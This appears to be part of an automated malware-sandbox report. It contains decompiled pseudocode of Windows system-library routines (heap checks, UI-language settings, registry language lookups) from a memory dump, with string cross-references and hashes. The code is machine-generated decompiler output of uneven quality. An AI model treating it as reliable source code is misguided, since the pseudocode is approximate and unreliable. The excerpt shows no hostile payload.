                                                                                                					_t97 = L06E1F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
                                                                                                					if(_t97 >= 0) {
                                                                                                						if(_v52 != 1) {
                                                                                                							L17:
                                                                                                							_t97 = 0xc0000001;
                                                                                                							goto L6;
                                                                                                						}
                                                                                                						_t59 =  *_t78 & 0x0000ffff;
                                                                                                						_t94 = _t78;
                                                                                                						_t83 = _t59;
                                                                                                						if(_t59 == 0) {
                                                                                                							L19:
                                                                                                							if(_t83 == 0) {
                                                                                                								L23:
                                                                                                								E06E5BB40(_t83, _t102 + 0x24, _t78);
                                                                                                								if(L06E243C0( &_v48,  &_v64) == 0) {
                                                                                                									goto L17;
                                                                                                								}
                                                                                                								_t84 = _v48;
                                                                                                								 *_v48 = _v56;
                                                                                                								if( *_t94 != 0) {
                                                                                                									E06E5BB40(_t84, _t102 + 0x24, _t94);
                                                                                                									if(L06E243C0( &_v48,  &_v64) != 0) {
                                                                                                										 *_a4 = _v56;
                                                                                                									} else {
                                                                                                										_t97 = 0xc0000001;
                                                                                                										 *_v48 = 0;
                                                                                                									}
                                                                                                								}
                                                                                                								goto L6;
                                                                                                							}
                                                                                                							_t83 = _t83 & 0x0000ffff;
                                                                                                							while(_t83 == 0x20) {
                                                                                                								_t94 =  &(_t94[1]);
                                                                                                								_t74 =  *_t94 & 0x0000ffff;
                                                                                                								_t83 = _t74;
                                                                                                								if(_t74 != 0) {
                                                                                                									continue;
                                                                                                								}
                                                                                                								goto L23;
                                                                                                							}
                                                                                                							goto L23;
                                                                                                						} else {
                                                                                                							goto L14;
                                                                                                						}
                                                                                                						while(1) {
                                                                                                							L14:
                                                                                                							_t27 =  &(_t94[1]); // 0x2
                                                                                                							_t75 = _t27;
                                                                                                							if(_t83 == 0x2c) {
                                                                                                								break;
                                                                                                							}
                                                                                                							_t94 = _t75;
                                                                                                							_t76 =  *_t94 & 0x0000ffff;
                                                                                                							_t83 = _t76;
                                                                                                							if(_t76 != 0) {
                                                                                                								continue;
                                                                                                							}
                                                                                                							goto L23;
                                                                                                						}
                                                                                                						 *_t94 = 0;
                                                                                                						_t94 = _t75;
                                                                                                						_t83 =  *_t75 & 0x0000ffff;
                                                                                                						goto L19;
                                                                                                					}
                                                                                                				}
                                                                                                			}


                                                                                                Strings
                                                                                                • @, xrefs: 06E1E6C0
                                                                                                • InstallLanguageFallback, xrefs: 06E1E6DB
                                                                                                • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 06E1E68C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                                                • API String ID: 0-1757540487
                                                                                                • Opcode ID: 55244c448b9d51ff23a1b708c727e1337dd74deefd8b11d8fe583f4b2cb4fbea
                                                                                                • Instruction ID: ad0f5d85f40ec17a7eecbae6b82166802cd93e619563962cc106de6b2def49e8
                                                                                                • Opcode Fuzzy Hash: 55244c448b9d51ff23a1b708c727e1337dd74deefd8b11d8fe583f4b2cb4fbea
                                                                                                • Instruction Fuzzy Hash: C051C4729083459BD794DF24C840AABB3E8BF88618F05192EF995DB240FB34D905D7A2
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 60%
                                                                                                			E06E3B8E4(unsigned int __edx) {
                                                                                                				void* __ecx;
                                                                                                				void* __edi;
                                                                                                				intOrPtr* _t16;
                                                                                                				intOrPtr _t18;
                                                                                                				void* _t27;
                                                                                                				void* _t28;
                                                                                                				unsigned int _t30;
                                                                                                				intOrPtr* _t31;
                                                                                                				unsigned int _t38;
                                                                                                				void* _t39;
                                                                                                				unsigned int _t40;
                                                                                                
                                                                                                				_t40 = __edx;
                                                                                                				_t39 = _t28;
                                                                                                				if( *0x6f08748 >= 1) {
                                                                                                					__eflags = (__edx + 0x00000fff & 0xfffff000) - __edx;
                                                                                                					if((__edx + 0x00000fff & 0xfffff000) != __edx) {
                                                                                                						_t18 =  *[fs:0x30];
                                                                                                						__eflags =  *(_t18 + 0xc);
                                                                                                						if( *(_t18 + 0xc) == 0) {
                                                                                                							_push("HEAP: ");
                                                                                                							E06E1B150();
                                                                                                						} else {
                                                                                                							E06E1B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                						}
                                                                                                						_push("(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)");
                                                                                                						E06E1B150();
                                                                                                						__eflags =  *0x6f07bc8;
                                                                                                						if(__eflags == 0) {
                                                                                                							E06ED2073(_t27, 1, _t39, __eflags);
                                                                                                						}
                                                                                                					}
                                                                                                				}
                                                                                                				_t38 =  *(_t39 + 0xb8);
                                                                                                				if(_t38 != 0) {
                                                                                                					_t13 = _t40 >> 0xc;
                                                                                                					__eflags = _t13;
                                                                                                					while(1) {
                                                                                                						__eflags = _t13 -  *((intOrPtr*)(_t38 + 4));
                                                                                                						if(_t13 <  *((intOrPtr*)(_t38 + 4))) {
                                                                                                							break;
                                                                                                						}
                                                                                                						_t30 =  *_t38;
                                                                                                						__eflags = _t30;
                                                                                                						if(_t30 != 0) {
                                                                                                							_t38 = _t30;
                                                                                                							continue;
                                                                                                						}
                                                                                                						_t13 =  *((intOrPtr*)(_t38 + 4)) - 1;
                                                                                                						__eflags =  *((intOrPtr*)(_t38 + 4)) - 1;
                                                                                                						break;
                                                                                                					}
                                                                                                					return E06E3AB40(_t39, _t38, 0, _t13, _t40);
                                                                                                				} else {
                                                                                                					_t31 = _t39 + 0x8c;
                                                                                                					_t16 =  *_t31;
                                                                                                					while(_t31 != _t16) {
                                                                                                						__eflags =  *((intOrPtr*)(_t16 + 0x14)) - _t40;
                                                                                                						if( *((intOrPtr*)(_t16 + 0x14)) >= _t40) {
                                                                                                							return _t16;
                                                                                                						}
                                                                                                						_t16 =  *_t16;
                                                                                                					}
                                                                                                					return _t31;
                                                                                                				}
                                                                                                			}















                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                • API String ID: 0-2558761708
                                                                                                • Opcode ID: f58ff22cc2467a122d2ad201931712100817d1322f771eb43aaf18958f880e74
                                                                                                • Instruction ID: 471c754df7227872818040c22578ce0a74cbf40937fb89a8233ed840c50a3512
                                                                                                • Opcode Fuzzy Hash: f58ff22cc2467a122d2ad201931712100817d1322f771eb43aaf18958f880e74
                                                                                                • Instruction Fuzzy Hash: 6B112631B143219FEBE8DB14C888F76B3A9EF60A24F15A029E11BCF240D730D984C681
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 80%
                                                                                                			E06E4FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
                                                                                                				char _v5;
                                                                                                				signed int _v8;
                                                                                                				signed int _v12;
                                                                                                				char _v16;
                                                                                                				char _v17;
                                                                                                				char _v20;
                                                                                                				signed int _v24;
                                                                                                				char _v28;
                                                                                                				char _v32;
                                                                                                				signed int _v40;
                                                                                                				void* __ecx;
                                                                                                				void* __edi;
                                                                                                				void* __ebp;
                                                                                                				signed int _t73;
                                                                                                				intOrPtr* _t75;
                                                                                                				signed int _t77;
                                                                                                				signed int _t79;
                                                                                                				signed int _t81;
                                                                                                				intOrPtr _t83;
                                                                                                				intOrPtr _t85;
                                                                                                				intOrPtr _t86;
                                                                                                				signed int _t91;
                                                                                                				signed int _t94;
                                                                                                				signed int _t95;
                                                                                                				signed int _t96;
                                                                                                				signed int _t106;
                                                                                                				signed int _t108;
                                                                                                				signed int _t114;
                                                                                                				signed int _t116;
                                                                                                				signed int _t118;
                                                                                                				signed int _t122;
                                                                                                				signed int _t123;
                                                                                                				void* _t129;
                                                                                                				signed int _t130;
                                                                                                				void* _t132;
                                                                                                				intOrPtr* _t134;
                                                                                                				signed int _t138;
                                                                                                				signed int _t141;
                                                                                                				signed int _t147;
                                                                                                				intOrPtr _t153;
                                                                                                				signed int _t154;
                                                                                                				signed int _t155;
                                                                                                				signed int _t170;
                                                                                                				void* _t174;
                                                                                                				signed int _t176;
                                                                                                				signed int _t177;
                                                                                                
                                                                                                				_t129 = __ebx;
                                                                                                				_push(_t132);
                                                                                                				_push(__esi);
                                                                                                				_t174 = _t132;
                                                                                                				_t73 =  !( *( *(_t174 + 0x18)));
                                                                                                				if(_t73 >= 0) {
                                                                                                					L5:
                                                                                                					return _t73;
                                                                                                				} else {
                                                                                                					E06E2EEF0(0x6f07b60);
                                                                                                					_t134 =  *0x6f07b84; // 0x771a7b80
                                                                                                					_t2 = _t174 + 0x24; // 0x24
                                                                                                					_t75 = _t2;
                                                                                                					if( *_t134 != 0x6f07b80) {
                                                                                                						_push(3);
                                                                                                						asm("int 0x29");
                                                                                                						asm("int3");
                                                                                                						asm("int3");
                                                                                                						asm("int3");
                                                                                                						asm("int3");
                                                                                                						asm("int3");
                                                                                                						asm("int3");
                                                                                                						asm("int3");
                                                                                                						asm("int3");
                                                                                                						asm("int3");
                                                                                                						asm("int3");
                                                                                                						asm("int3");
                                                                                                						asm("int3");
                                                                                                						asm("int3");
                                                                                                						asm("int3");
                                                                                                						asm("int3");
                                                                                                						asm("int3");
                                                                                                						asm("int3");
                                                                                                						asm("int3");
                                                                                                						asm("int3");
                                                                                                						_push(0x6f07b60);
                                                                                                						_t170 = _v8;
                                                                                                						_v28 = 0;
                                                                                                						_v40 = 0;
                                                                                                						_v24 = 0;
                                                                                                						_v17 = 0;
                                                                                                						_v32 = 0;
                                                                                                						__eflags = _t170 & 0xffff7cf2;
                                                                                                						if((_t170 & 0xffff7cf2) != 0) {
                                                                                                							L43:
                                                                                                							_t77 = 0xc000000d;
                                                                                                						} else {
                                                                                                							_t79 = _t170 & 0x0000000c;
                                                                                                							__eflags = _t79;
                                                                                                							if(_t79 != 0) {
                                                                                                								__eflags = _t79 - 0xc;
                                                                                                								if(_t79 == 0xc) {
                                                                                                									goto L43;
                                                                                                								} else {
                                                                                                									goto L9;
                                                                                                								}
                                                                                                							} else {
                                                                                                								_t170 = _t170 | 0x00000008;
                                                                                                								__eflags = _t170;
                                                                                                								L9:
                                                                                                								_t81 = _t170 & 0x00000300;
                                                                                                								__eflags = _t81 - 0x300;
                                                                                                								if(_t81 == 0x300) {
                                                                                                									goto L43;
                                                                                                								} else {
                                                                                                									_t138 = _t170 & 0x00000001;
                                                                                                									__eflags = _t138;
                                                                                                									_v24 = _t138;
                                                                                                									if(_t138 != 0) {
                                                                                                										__eflags = _t81;
                                                                                                										if(_t81 != 0) {
                                                                                                											goto L43;
                                                                                                										} else {
                                                                                                											goto L11;
                                                                                                										}
                                                                                                									} else {
                                                                                                										L11:
                                                                                                										_push(_t129);
                                                                                                										_t77 = E06E26D90( &_v20);
                                                                                                										_t130 = _t77;
                                                                                                										__eflags = _t130;
                                                                                                										if(_t130 >= 0) {
                                                                                                											_push(_t174);
                                                                                                											__eflags = _t170 & 0x00000301;
                                                                                                											if((_t170 & 0x00000301) == 0) {
                                                                                                												_t176 = _a8;
                                                                                                												__eflags = _t176;
                                                                                                												if(__eflags == 0) {
                                                                                                													L64:
                                                                                                													_t83 =  *[fs:0x18];
                                                                                                													_t177 = 0;
                                                                                                													__eflags =  *(_t83 + 0xfb8);
                                                                                                													if( *(_t83 + 0xfb8) != 0) {
                                                                                                														E06E276E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
                                                                                                														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
                                                                                                													}
                                                                                                													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
                                                                                                													goto L15;
                                                                                                												} else {
                                                                                                													asm("sbb edx, edx");
                                                                                                													_t114 = E06EB8938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
                                                                                                													__eflags = _t114;
                                                                                                													if(_t114 < 0) {
                                                                                                														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
                                                                                                														E06E1B150();
                                                                                                													}
                                                                                                													_t116 = E06EB6D81(_t176,  &_v16);
                                                                                                													__eflags = _t116;
                                                                                                													if(_t116 >= 0) {
                                                                                                														__eflags = _v16 - 2;
                                                                                                														if(_v16 < 2) {
                                                                                                															L56:
                                                                                                															_t118 = E06E275CE(_v20, 5, 0);
                                                                                                															__eflags = _t118;
                                                                                                															if(_t118 < 0) {
                                                                                                																L67:
                                                                                                																_t130 = 0xc0000017;
                                                                                                																goto L32;
                                                                                                															} else {
                                                                                                																__eflags = _v12;
                                                                                                																if(_v12 == 0) {
                                                                                                																	goto L67;
                                                                                                																} else {
                                                                                                																	_t153 =  *0x6f08638; // 0xe36c38
                                                                                                																	_t122 = L06E238A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
                                                                                                																	_t154 = _v12;
                                                                                                																	_t130 = _t122;
                                                                                                																	__eflags = _t130;
                                                                                                																	if(_t130 >= 0) {
                                                                                                																		_t123 =  *(_t154 + 4) & 0x0000ffff;
                                                                                                																		__eflags = _t123;
                                                                                                																		if(_t123 != 0) {
                                                                                                																			_t155 = _a12;
                                                                                                																			__eflags = _t155;
                                                                                                																			if(_t155 != 0) {
                                                                                                																				 *_t155 = _t123;
                                                                                                																			}
                                                                                                																			goto L64;
                                                                                                																		} else {
                                                                                                																			E06E276E2(_t154);
                                                                                                																			goto L41;
                                                                                                																		}
                                                                                                																	} else {
                                                                                                																		E06E276E2(_t154);
                                                                                                																		_t177 = 0;
                                                                                                																		goto L18;
                                                                                                																	}
                                                                                                																}
                                                                                                															}
                                                                                                														} else {
                                                                                                															__eflags =  *_t176;
                                                                                                															if( *_t176 != 0) {
                                                                                                																goto L56;
                                                                                                															} else {
                                                                                                																__eflags =  *(_t176 + 2);
                                                                                                																if( *(_t176 + 2) == 0) {
                                                                                                																	goto L64;
                                                                                                																} else {
                                                                                                																	goto L56;
                                                                                                																}
                                                                                                															}
                                                                                                														}
                                                                                                													} else {
                                                                                                														_t130 = 0xc000000d;
                                                                                                														goto L32;
                                                                                                													}
                                                                                                												}
                                                                                                												goto L35;
                                                                                                											} else {
                                                                                                												__eflags = _a8;
                                                                                                												if(_a8 != 0) {
                                                                                                													_t77 = 0xc000000d;
                                                                                                												} else {
                                                                                                													_v5 = 1;
                                                                                                													L06E4FCE3(_v20, _t170);
                                                                                                													_t177 = 0;
                                                                                                													__eflags = 0;
                                                                                                													L15:
                                                                                                													_t85 =  *[fs:0x18];
                                                                                                													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
                                                                                                													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
                                                                                                														L18:
                                                                                                														__eflags = _t130;
                                                                                                														if(_t130 != 0) {
                                                                                                															goto L32;
                                                                                                														} else {
                                                                                                															__eflags = _v5 - _t130;
                                                                                                															if(_v5 == _t130) {
                                                                                                																goto L32;
                                                                                                															} else {
                                                                                                																_t86 =  *[fs:0x18];
                                                                                                																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
                                                                                                																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
                                                                                                																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
                                                                                                																}
                                                                                                																__eflags = _t177;
                                                                                                																if(_t177 == 0) {
                                                                                                																	L31:
                                                                                                																	__eflags = 0;
                                                                                                																	L06E270F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
                                                                                                																	goto L32;
                                                                                                																} else {
                                                                                                																	__eflags = _v24;
                                                                                                																	_t91 =  *(_t177 + 0x20);
                                                                                                																	if(_v24 != 0) {
                                                                                                																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
                                                                                                																		goto L31;
                                                                                                																	} else {
                                                                                                																		_t141 = _t91 & 0x00000040;
                                                                                                																		__eflags = _t170 & 0x00000100;
                                                                                                																		if((_t170 & 0x00000100) == 0) {
                                                                                                																			__eflags = _t141;
                                                                                                																			if(_t141 == 0) {
                                                                                                																				L74:
                                                                                                																				_t94 = _t91 & 0xfffffffd | 0x00000004;
                                                                                                																				goto L27;
                                                                                                																			} else {
                                                                                                																				_t177 = E06E4FD22(_t177);
                                                                                                																				__eflags = _t177;
                                                                                                																				if(_t177 == 0) {
                                                                                                																					goto L42;
                                                                                                																				} else {
                                                                                                																					_t130 = E06E4FD9B(_t177, 0, 4);
                                                                                                																					__eflags = _t130;
                                                                                                																					if(_t130 != 0) {
                                                                                                																						goto L42;
                                                                                                																					} else {
                                                                                                																						_t68 = _t177 + 0x20;
                                                                                                																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
                                                                                                																						__eflags =  *_t68;
                                                                                                																						_t91 =  *(_t177 + 0x20);
                                                                                                																						goto L74;
                                                                                                																					}
                                                                                                																				}
                                                                                                																			}
                                                                                                																			goto L35;
                                                                                                																		} else {
                                                                                                																			__eflags = _t141;
                                                                                                																			if(_t141 != 0) {
                                                                                                																				_t177 = E06E4FD22(_t177);
                                                                                                																				__eflags = _t177;
                                                                                                																				if(_t177 == 0) {
                                                                                                																					L42:
                                                                                                																					_t77 = 0xc0000001;
                                                                                                																					goto L33;
                                                                                                																				} else {
                                                                                                																					_t130 = E06E4FD9B(_t177, 0, 4);
                                                                                                																					__eflags = _t130;
                                                                                                																					if(_t130 != 0) {
                                                                                                																						goto L42;
                                                                                                																					} else {
                                                                                                																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
                                                                                                																						_t91 =  *(_t177 + 0x20);
                                                                                                																						goto L26;
                                                                                                																					}
                                                                                                																				}
                                                                                                																				goto L35;
                                                                                                																			} else {
                                                                                                																				L26:
                                                                                                																				_t94 = _t91 & 0xfffffffb | 0x00000002;
                                                                                                																				__eflags = _t94;
                                                                                                																				L27:
                                                                                                																				 *(_t177 + 0x20) = _t94;
                                                                                                																				__eflags = _t170 & 0x00008000;
                                                                                                																				if((_t170 & 0x00008000) != 0) {
                                                                                                																					_t95 = _a12;
                                                                                                																					__eflags = _t95;
                                                                                                																					if(_t95 != 0) {
                                                                                                																						_t96 =  *_t95;
                                                                                                																						__eflags = _t96;
                                                                                                																						if(_t96 != 0) {
                                                                                                																							 *((short*)(_t177 + 0x22)) = 0;
                                                                                                																							_t40 = _t177 + 0x20;
                                                                                                																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
                                                                                                																							__eflags =  *_t40;
                                                                                                																						}
                                                                                                																					}
                                                                                                																				}
                                                                                                																				goto L31;
                                                                                                																			}
                                                                                                																		}
                                                                                                																	}
                                                                                                																}
                                                                                                															}
                                                                                                														}
                                                                                                													} else {
                                                                                                														_t147 =  *( *[fs:0x18] + 0xfc0);
                                                                                                														_t106 =  *(_t147 + 0x20);
                                                                                                														__eflags = _t106 & 0x00000040;
                                                                                                														if((_t106 & 0x00000040) != 0) {
                                                                                                															_t147 = E06E4FD22(_t147);
                                                                                                															__eflags = _t147;
                                                                                                															if(_t147 == 0) {
                                                                                                																L41:
                                                                                                																_t130 = 0xc0000001;
                                                                                                																L32:
                                                                                                																_t77 = _t130;
                                                                                                																goto L33;
                                                                                                															} else {
                                                                                                																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
                                                                                                																_t106 =  *(_t147 + 0x20);
                                                                                                																goto L17;
                                                                                                															}
                                                                                                															goto L35;
                                                                                                														} else {
                                                                                                															L17:
                                                                                                															_t108 = _t106 | 0x00000080;
                                                                                                															__eflags = _t108;
                                                                                                															 *(_t147 + 0x20) = _t108;
                                                                                                															 *( *[fs:0x18] + 0xfc0) = _t147;
                                                                                                															goto L18;
                                                                                                														}
                                                                                                													}
                                                                                                												}
                                                                                                											}
                                                                                                											L33:
                                                                                                										}
                                                                                                									}
                                                                                                								}
                                                                                                							}
                                                                                                						}
                                                                                                						L35:
                                                                                                						return _t77;
                                                                                                					} else {
                                                                                                						 *_t75 = 0x6f07b80;
                                                                                                						 *((intOrPtr*)(_t75 + 4)) = _t134;
                                                                                                						 *_t134 = _t75;
                                                                                                						 *0x6f07b84 = _t75;
                                                                                                						_t73 = E06E2EB70(_t134, 0x6f07b60);
                                                                                                						if( *0x6f07b20 != 0) {
                                                                                                							_t73 =  *( *[fs:0x30] + 0xc);
                                                                                                							if( *((char*)(_t73 + 0x28)) == 0) {
                                                                                                								_t73 = E06E2FF60( *0x6f07b20);
                                                                                                							}
                                                                                                						}
                                                                                                						goto L5;
                                                                                                					}
                                                                                                				}
                                                                                                			}

















































                                                                                                0x06e4fbde
                                                                                                0x06e4fbcb
                                                                                                0x06e4fbab
                                                                                                0x06e4fc8b
                                                                                                0x06e4fc8b
                                                                                                0x06e4fc8c
                                                                                                0x06e4fb80
                                                                                                0x06e4fb72
                                                                                                0x06e4fb5e
                                                                                                0x06e4fc8d
                                                                                                0x06e4fc91
                                                                                                0x06e4fadf
                                                                                                0x06e4fadf
                                                                                                0x06e4fae1
                                                                                                0x06e4fae4
                                                                                                0x06e4fae7
                                                                                                0x06e4faec
                                                                                                0x06e4faf8
                                                                                                0x06e4fb00
                                                                                                0x06e4fb07
                                                                                                0x06e4fb0f
                                                                                                0x06e4fb0f
                                                                                                0x06e4fb07
                                                                                                0x00000000
                                                                                                0x06e4faf8
                                                                                                0x06e4fadd

                                                                                                Strings
                                                                                                • 8l, xrefs: 06E8BE66
                                                                                                • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 06E8BE0F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!$8l
                                                                                                • API String ID: 0-1476619989
                                                                                                • Opcode ID: fd6fab6df4b1e0aeb718f78a7138fa227a8623a9cdf445f90061baa5dbec8007
                                                                                                • Instruction ID: 888dfd78c0b86c6ac7d5f828d17f7b8e908f5e30e409b3dd9354e1441bce96ba
                                                                                                • Opcode Fuzzy Hash: fd6fab6df4b1e0aeb718f78a7138fa227a8623a9cdf445f90061baa5dbec8007
                                                                                                • Instruction Fuzzy Hash: 80A1F471F007069FEBA5FF74D850BBAB3A5AF84B14F055569E91ADB680DB30D801CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 60%
                                                                                                			E06EDE539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
                                                                                                				signed int _v20;
                                                                                                				char _v24;
                                                                                                				signed int _v40;
                                                                                                				char _v44;
                                                                                                				intOrPtr _v48;
                                                                                                				signed int _v52;
                                                                                                				unsigned int _v56;
                                                                                                				char _v60;
                                                                                                				signed int _v64;
                                                                                                				char _v68;
                                                                                                				signed int _v72;
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				char _t87;
                                                                                                				signed int _t90;
                                                                                                				signed int _t94;
                                                                                                				signed int _t100;
                                                                                                				intOrPtr* _t113;
                                                                                                				signed int _t122;
                                                                                                				void* _t132;
                                                                                                				void* _t135;
                                                                                                				signed int _t139;
                                                                                                				signed int* _t141;
                                                                                                				signed int _t146;
                                                                                                				signed int _t147;
                                                                                                				void* _t153;
                                                                                                				signed int _t155;
                                                                                                				signed int _t159;
                                                                                                				char _t166;
                                                                                                				void* _t172;
                                                                                                				void* _t176;
                                                                                                				signed int _t177;
                                                                                                				intOrPtr* _t179;
                                                                                                
                                                                                                				_t179 = __ecx;
                                                                                                				_v48 = __edx;
                                                                                                				_v68 = 0;
                                                                                                				_v72 = 0;
                                                                                                				_push(__ecx[1]);
                                                                                                				_push( *__ecx);
                                                                                                				_push(0);
                                                                                                				_t153 = 0x14;
                                                                                                				_t135 = _t153;
                                                                                                				_t132 = E06EDBBBB(_t135, _t153);
                                                                                                				if(_t132 == 0) {
                                                                                                					_t166 = _v68;
                                                                                                					goto L43;
                                                                                                				} else {
                                                                                                					_t155 = 0;
                                                                                                					_v52 = 0;
                                                                                                					asm("stosd");
                                                                                                					asm("stosd");
                                                                                                					asm("stosd");
                                                                                                					asm("stosd");
                                                                                                					asm("stosd");
                                                                                                					_v56 = __ecx[1];
                                                                                                					if( *__ecx >> 8 < 2) {
                                                                                                						_t155 = 1;
                                                                                                						_v52 = 1;
                                                                                                					}
                                                                                                					_t139 = _a4;
                                                                                                					_t87 = (_t155 << 0xc) + _t139;
                                                                                                					_v60 = _t87;
                                                                                                					if(_t87 < _t139) {
                                                                                                						L11:
                                                                                                						_t166 = _v68;
                                                                                                						L12:
                                                                                                						if(_t132 != 0) {
                                                                                                							E06EDBCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
                                                                                                						}
                                                                                                						L43:
                                                                                                						if(_v72 != 0) {
                                                                                                							_push( *((intOrPtr*)(_t179 + 4)));
                                                                                                							_push( *_t179);
                                                                                                							_push(0x8000);
                                                                                                							E06EDAFDE( &_v72,  &_v60);
                                                                                                						}
                                                                                                						L46:
                                                                                                						return _t166;
                                                                                                					}
                                                                                                					_t90 =  *(_t179 + 0xc) & 0x40000000;
                                                                                                					asm("sbb edi, edi");
                                                                                                					_t172 = ( ~_t90 & 0x0000003c) + 4;
                                                                                                					if(_t90 != 0) {
                                                                                                						_push(0);
                                                                                                						_push(0x14);
                                                                                                						_push( &_v44);
                                                                                                						_push(3);
                                                                                                						_push(_t179);
                                                                                                						_push(0xffffffff);
                                                                                                						if(E06E59730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
                                                                                                							_push(_t139);
                                                                                                							E06EDA80D(_t179, 1, _v40, 0);
                                                                                                							_t172 = 4;
                                                                                                						}
                                                                                                					}
                                                                                                					_t141 =  &_v72;
                                                                                                					if(E06EDA854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
                                                                                                						_v64 = _a4;
                                                                                                						_t94 =  *(_t179 + 0xc) & 0x40000000;
                                                                                                						asm("sbb edi, edi");
                                                                                                						_t176 = ( ~_t94 & 0x0000003c) + 4;
                                                                                                						if(_t94 != 0) {
                                                                                                							_push(0);
                                                                                                							_push(0x14);
                                                                                                							_push( &_v24);
                                                                                                							_push(3);
                                                                                                							_push(_t179);
                                                                                                							_push(0xffffffff);
                                                                                                							if(E06E59730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
                                                                                                								_push(_t141);
                                                                                                								E06EDA80D(_t179, 1, _v20, 0);
                                                                                                								_t176 = 4;
                                                                                                							}
                                                                                                						}
                                                                                                						if(E06EDA854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
                                                                                                							goto L11;
                                                                                                						} else {
                                                                                                							_t177 = _v64;
                                                                                                							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
                                                                                                							_t100 = _v52 + _v52;
                                                                                                							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
                                                                                                							 *(_t132 + 0x10) = _t146;
                                                                                                							asm("bsf eax, [esp+0x18]");
                                                                                                							_v52 = _t100;
                                                                                                							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
                                                                                                							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
                                                                                                							_t47 =  &_a8;
                                                                                                							 *_t47 = _a8 & 0x00000001;
                                                                                                							if( *_t47 == 0) {
                                                                                                								E06E32280(_t179 + 0x30, _t179 + 0x30);
                                                                                                							}
                                                                                                							_t147 =  *(_t179 + 0x34);
                                                                                                							_t159 =  *(_t179 + 0x38) & 1;
                                                                                                							_v68 = 0;
                                                                                                							if(_t147 == 0) {
                                                                                                								L35:
                                                                                                								E06E2B090(_t179 + 0x34, _t147, _v68, _t132);
                                                                                                								if(_a8 == 0) {
                                                                                                									E06E2FFB0(_t132, _t177, _t179 + 0x30);
                                                                                                								}
                                                                                                								asm("lock xadd [eax], ecx");
                                                                                                								asm("lock xadd [eax], edx");
                                                                                                								_t132 = 0;
